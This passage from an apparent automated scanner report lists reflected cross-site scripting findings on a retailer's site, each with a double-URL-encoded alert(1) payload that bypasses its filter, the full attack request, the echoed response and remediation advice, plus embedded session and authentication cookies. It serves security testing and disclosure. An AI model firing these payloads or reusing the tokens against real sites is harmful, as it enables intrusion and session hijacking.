Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcaab7d";alert(1)//1ec0894cb1e/medialib/labware/labware-icons/pipettes","E404") ;
   </script>
...[SNIP]...

1.389. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e0b%2522%253balert%25281%2529%252f%252ff2db94c8e27 was submitted in the REST URL parameter 2. This input was echoed as 73e0b";alert(1)//f2db94c8e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib73e0b%2522%253balert%25281%2529%252f%252ff2db94c8e27/labware/labware-icons/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib73e0b";alert(1)//f2db94c8e27/labware/labware-icons/pipettes","E404") ;
   </script>
...[SNIP]...

1.390. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec61f%2522%253balert%25281%2529%252f%252f7ddab408077 was submitted in the REST URL parameter 3. This input was echoed as ec61f";alert(1)//7ddab408077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwareec61f%2522%253balert%25281%2529%252f%252f7ddab408077/labware-icons/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwareec61f";alert(1)//7ddab408077/labware-icons/pipettes","E404") ;
   </script>
...[SNIP]...

1.391. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 500b8%2522%253balert%25281%2529%252f%252f9243a1f255a was submitted in the REST URL parameter 4. This input was echoed as 500b8";alert(1)//9243a1f255a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons500b8%2522%253balert%25281%2529%252f%252f9243a1f255a/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons500b8";alert(1)//9243a1f255a/pipettes","E404") ;
   </script>
...[SNIP]...

1.392. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5bf3%2522%253balert%25281%2529%252f%252f29db45669a4 was submitted in the REST URL parameter 5. This input was echoed as c5bf3";alert(1)//29db45669a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/pipettesc5bf3%2522%253balert%25281%2529%252f%252f29db45669a4 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/pipettesc5bf3";alert(1)//29db45669a4","E404") ;
   </script>
...[SNIP]...

1.393. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5755%2522%253balert%25281%2529%252f%252fabe43477296 was submitted in the REST URL parameter 1. This input was echoed as c5755";alert(1)//abe43477296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcc5755%2522%253balert%25281%2529%252f%252fabe43477296/medialib/labware/labware-icons/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
